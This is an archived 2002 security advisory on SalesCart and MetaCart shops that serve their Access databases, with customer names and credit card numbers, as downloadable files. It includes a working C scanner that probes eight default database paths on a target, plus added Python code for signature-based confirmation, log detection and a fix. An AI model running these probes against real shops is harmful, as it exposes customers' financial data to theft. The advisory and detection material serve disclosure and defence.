[NEWS] SalesCart Database Storage Insecurity

From: support@securiteam.com
Date: 06/22/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 22 Jun 2002 08:34:49 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  SalesCart Database Storage Insecurity
------------------------------------------------------------------------

SUMMARY

 <http://www.salescart.com/> SalesCart is an e-commerce package built on top
of the web site design and development tool Microsoft FrontPage. It keeps its
data in a Microsoft Access database (shop.mdb) that is stored inside the web
root, where the web server hands it out like any other static file. A remote
attacker can therefore download the whole database and gain access to
sensitive information about the product's customers (name, surname, address,
e-mail, phone number, credit card number, and company name).

DETAILS

Example:
Requesting the following URL returns the product's database as a plain file
download. The fpdb directory is where FrontPage places Access databases by
default, and nothing in the product restricts direct requests to it:
http://xxxshop.com/fpdb/shop.mdb

The exploit below probes the same default location, plus the default
locations of the MetaCart database (metacart.mdb), which suffers from the
same problem.
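The scanner in this advisory counts any reply that contains "200" as a hit, which also fires on sites that answer every unknown URL with a custom error page and status 200. The following added example (not code from SecuriTeam, SalesCart, or the exploit's author) confirms an exposed database by the file signature that Access .mdb and .accdb files carry in their first bytes, and fetches only those bytes with a Range request. The host names in the usage line are placeholders.

```python
# Added example for this advisory (not code from SecuriTeam, SalesCart or the
# exploit author): confirm an exposed Access database by its file signature
# rather than by HTTP status alone, and read only the first bytes of the file.
import sys
import http.client

# Default database locations probed by the advisory's exploit
# (SalesCart shop.mdb and MetaCart metacart.mdb).
CANDIDATE_PATHS = [
    "/fpdb/shop.mdb",
    "/shoponline/fpdb/shop.mdb",
    "/database/metacart.mdb",
    "/shopping/database/metacart.mdb",
    "/shop/database/metacart.mdb",
    "/metacart/database/metacart.mdb",
    "/mcartfree/database/metacart.mdb",
    "/ASP/cart/database/metacart.mdb",
]

# Jet (Access 97/2000 .mdb) and ACE (Access 2007+ .accdb) files begin with
# a 4-byte version field followed by a NUL-terminated format string.
JET_SIGNATURE = b"\x00\x01\x00\x00Standard Jet DB\x00"
ACE_SIGNATURE = b"\x00\x01\x00\x00Standard ACE DB\x00"


def naive_hit(reply):
    """The advisory scanner's test: any '200' within the first 20 bytes."""
    return b"200" in reply[:20]


def classify(status, body):
    """Classify one probe as 'exposed', 'false-positive' or 'blocked'.

    A site that serves a custom error page with status 200 passes
    naive_hit() but is reported as a false positive here.
    """
    if status not in (200, 206):   # 206 = partial content for a Range request
        return "blocked"
    if body.startswith(JET_SIGNATURE) or body.startswith(ACE_SIGNATURE):
        return "exposed"
    return "false-positive"


def probe(host, path, timeout=5):
    """Fetch at most the first 32 bytes of path on host over plain HTTP."""
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Range": "bytes=0-31"})
        resp = conn.getresponse()
        return resp.status, resp.read(32)
    finally:
        conn.close()


def scan(host, paths=CANDIDATE_PATHS):
    """Return {path: verdict} for every candidate path on host."""
    results = {}
    for path in paths:
        try:
            status, body = probe(host, path)
            results[path] = classify(status, body)
        except OSError as exc:
            results[path] = "error: %s" % exc
    return results


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: %s www.example-shop.com" % sys.argv[0])   # placeholder host
    for path, verdict in scan(sys.argv[1]).items():
        print("%-40s %s" % (path, verdict))
```

A verdict of "exposed" means the file really is downloadable. The fix is to move the database outside the web root (or deny requests for *.mdb at the web server) and to treat every credential and card number stored in it as compromised.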

Exploit:
/* Find customer records on a shopping site that runs SalesCart or
   MetaCart */

/* tacettinkaradeniz@yahoo.com karadenizeregli@2002 */

/* I LoVe CiLeK :> */

/* Note: I did not write this program from start to finish. I only
   changed the parts that needed changing to get it into the shape
   I wanted :> */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
  char *bulunan;            /* strstr() hit inside a reply */
  char tampon[1024];        /* buffer for the initial HEAD / banner */
  char mesaj[] = "200";     /* a "200" in the reply counts as a hit */
  int toplam=0;             /* index of the path being probed */
  int sayac;
  int buldum=0;             /* number of database files found */
  char shoptampon[20];      /* first bytes of each probe reply */
  char *tmp[10];            /* raw HTTP/1.0 requests, one per default path */
  char *hata[10];           /* the same paths, for printing */

  int sock;
  struct sockaddr_in sin;
  struct hostent *he;

  /* Default database locations of SalesCart (shop.mdb) and MetaCart
     (metacart.mdb); both sit as plain files under the web root. */
  tmp[1]="GET /fpdb/shop.mdb HTTP/1.0\n\n";
  tmp[2]="GET /shoponline/fpdb/shop.mdb HTTP/1.0\n\n";
  tmp[3]="GET /database/metacart.mdb HTTP/1.0\n\n";
  tmp[4]="GET /shopping/database/metacart.mdb HTTP/1.0\n\n";
  tmp[5]="GET /shop/database/metacart.mdb HTTP/1.0\n\n";
  tmp[6]="GET /metacart/database/metacart.mdb HTTP/1.0\n\n";
  tmp[7]="GET /mcartfree/database/metacart.mdb HTTP/1.0\n\n";
  tmp[8]="GET /ASP/cart/database/metacart.mdb HTTP/1.0\n\n";

  hata[1] = "/fpdb/shop.mdb ";
  hata[2] = "/shoponline/fpdb/shop.mdb ";
  hata[3] = "/database/metacart.mdb ";
  hata[4] = "/shopping/database/metacart.mdb ";
  hata[5] = "/shop/database/metacart.mdb ";
  hata[6] = "/metacart/database/metacart.mdb ";
  hata[7] = "/mcartfree/database/metacart.mdb ";
  hata[8] = "/ASP/cart/database/metacart.mdb ";

  if (argc<2)
  {
    system("clear");
    printf("\n\t _ ");
    printf("\n\t|_ ._ _ _ | o ");
    printf("\n\t|_ | (/_ (_| | | ");
    printf("\n\t _| ");
    printf("\n\nSalescart - Metacart (c) 2002 ");
    printf("\nUsage : %s www.xxxshopxyz.com\n\n",argv[0]);

    exit(0);
  }

  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }
  system("clear");
  printf("\n\t _ ");
  printf("\n\t|_ ._ _ _ | o ");
  printf("\n\t|_ | (/_ (_| | | ");
  printf("\n\t _| ");
  printf("\n\t Salescart - Metacart (c) 2002 ");

  /* First connection: fetch the server banner with a HEAD request. */
  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);

  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {
    perror("connect");
  }
  send(sock, "HEAD / HTTP/1.0\n\n",17,0);

  memset(tampon, 0, sizeof(tampon));
  recv(sock, tampon, sizeof(tampon)-1,0);   /* leave room for the NUL */
  printf("%s",tampon);
  close(sock);
  system("clear");
  printf("Scanning..\n\n");

  /* One connection per candidate path (HTTP/1.0, no keep-alive). */
  while(toplam++ < 8)
  {
    sock=socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
      perror("connect");
    }

    for(sayac=0;sayac < 20;sayac++)
    {
      shoptampon[sayac] = '\0';
    }

    send(sock, tmp[toplam],strlen(tmp[toplam]),0);
    recv(sock, shoptampon, sizeof(shoptampon)-1,0);

    /* Any "200" in the first bytes of the reply is taken as a hit; a
       custom error page served with status 200 will also match. */
    bulunan = strstr(shoptampon,mesaj);

    if( bulunan != NULL)
    {
      printf("%s : ",hata[toplam]);
      printf(" Yesss.. Found :)\n");++buldum;
    }
    close(sock);
  }

  if (buldum)
  {
    printf("\n Scan finished for web site %s.\n", argv[1]);
  }
  else printf ("\n Sorry, the scan did not find any data...\n\n");

  return 0;
}
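From the server side, the scanner above leaves a recognisable trail: one client requesting several .mdb paths in quick succession, and a 200 with a large byte count on the one that exists. The following added example (not from the advisory or the vendor) runs that detection over IIS W3C extended log entries. The log lines are constructed for this example, with client addresses taken from the RFC 5737 documentation ranges.

```python
# Added example (not from the advisory or the vendor): a detection pass over
# IIS W3C extended log lines that flags requests for Access database files and
# the probing pattern of the scanner above. SAMPLE_LOG is constructed for this
# example; the client addresses are from the RFC 5737 documentation ranges.
import re
from collections import defaultdict

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status sc-bytes
2002-06-22 08:34:49 203.0.113.7 HEAD / 200 0
2002-06-22 08:34:50 203.0.113.7 GET /fpdb/shop.mdb 200 1536000
2002-06-22 08:34:50 203.0.113.7 GET /shoponline/fpdb/shop.mdb 404 1232
2002-06-22 08:34:51 203.0.113.7 GET /database/metacart.mdb 404 1232
2002-06-22 08:34:51 203.0.113.7 GET /shopping/database/metacart.mdb 404 1232
2002-06-22 08:35:02 198.51.100.20 GET /default.asp 200 8174
2002-06-22 08:35:03 198.51.100.20 GET /images/logo.gif 200 4410
2002-06-22 08:40:11 198.51.100.31 GET /fpdb/shop.mdb 403 1409
"""

# Access database files and the lock file Access writes next to them.
DB_FILE = re.compile(r"\.(mdb|accdb|ldb)$", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def find_db_access(text, probe_threshold=3):
    """Return (downloads, probes, scanners).

    downloads: (ip, path, bytes) for database files actually served (status 200)
    probes:    (ip, path, status) for every request that names a database file
    scanners:  client IPs that asked for >= probe_threshold distinct database paths
    """
    downloads, probes = [], []
    per_ip = defaultdict(set)
    for rec in parse_w3c(text):
        path = rec["cs-uri-stem"]
        if not DB_FILE.search(path):
            continue
        probes.append((rec["c-ip"], path, rec["sc-status"]))
        per_ip[rec["c-ip"]].add(path)
        if rec["sc-status"] == "200":
            downloads.append((rec["c-ip"], path, int(rec["sc-bytes"])))
    scanners = sorted(ip for ip, paths in per_ip.items()
                      if len(paths) >= probe_threshold)
    return downloads, probes, scanners


if __name__ == "__main__":
    downloads, probes, scanners = find_db_access(SAMPLE_LOG)
    for ip, path, size in downloads:
        print("DOWNLOAD  %s fetched %s (%d bytes)" % (ip, path, size))
    for ip in scanners:
        print("SCANNER   %s probed several database paths" % ip)
    print("%d database-file requests in total" % len(probes))
```

A 200 on a .mdb path is the incident itself, not a probe: the whole file, customer card numbers included, has left the server, so treat it as a confirmed data breach rather than an attempted one. The 403 from 198.51.100.31 shows what the log looks like once *.mdb requests are denied at the web server.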

ADDITIONAL INFORMATION

The information has been provided by <mailto:tacettinkaradeniz@yahoo.com>
Tacettin Karadeniz.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
